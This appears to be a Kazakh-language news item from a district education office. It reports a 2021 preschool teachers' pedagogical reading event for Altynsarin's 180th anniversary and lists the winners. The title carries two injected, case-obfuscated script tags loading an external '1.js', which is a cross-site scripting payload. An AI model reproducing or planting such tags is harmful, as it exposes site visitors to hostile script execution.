Ы.Алтынсариннің 180 жылдығына арналған «Даланың алып қоңырауы» тақырыбындағы мектепке дейінгі ұйымдардың педагогтар арасында аудандық Педагогикалық оқулары<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

05.11.2021

«Даланың алып қоңырауы»

        

2021 жылдың 4 қарашасында ауданның тәжірибелі педагогтарының құрамында Ы.Алтынсариннің 180 жылдығына арналған

«Даланың алып қоңырауы» тақырыбындағы мектепке дейінгі ұйымдардың педагогтар арасында аудандық Педагогикалық оқулары өткізілді.

 Мақсаты: жұмыс тәжірибесінде үздік педагогикалық идеяларды қолданатын, балалармен жұмыста шығармашылық танытатын креативті және  дарынды педагогтерді анықтау.

 Міндеттері:

- Ы. Алтынсариннің педагогикалық мұраларын зерделеу және насихаттау;

- педагогтердің шығармашылық қабілеттерін іске асыруға жағдай жасау;

-мектепке дейінгі ұйым педагогтерінің кәсіби қарым-қатынасы мен шығармашылық өзара ынтымақтастық саласын кеңейту.

Осы қойылған міндеттер негізінде лайықты жүлделі орындар бағаланды, атап айтқанда: Тулебаева А.Т.,І орын «Балдырған» мектеп-балабақшасының тәрбиешісі;Котенко И.В., І орын Журавлевка ЖББО мектебінің жанындағы «Радуга» ш/о тәрбиешісі;Хуандық А., ІІ орын «Балдәурен» бөбекжайының тәрбиешісі;«Снежинка» бөбекжайының ұжымы ІІ орын;Ахылова Г., ІІ орын «Балдәурен» бөбекжайының тәрбиешісі;Брежнева Ф.Е., ІІІ орын «Айгөлек» бөбекжайының тәрбиешісі;Васильчук И.А., ІІІ орын «Айгөлек» бөбекжайының тәрбиешісі;Киселева Н.А., ІІІ орын «Солнышко» бөбекжайының тәрбиешісі. Облыс кезеңіне  Тулебаева А.Т., «Балдырған» мектеп-балабақшасы және Котенко И.В., Журавлевка ЖББО мектебінің жанындағы «Радуга» шағын-орталығының педагогтары облыс кезеңіне жолдама алды. Облыстық кезеңнің жүлдегерлеріне сәттілік тілейміз!

 

Ғ.Баитова (Әдістемелік кабинетінің әдіскері).

Просмотров: 598


Пікір қосу



Деректерді қолтаңбаға қосу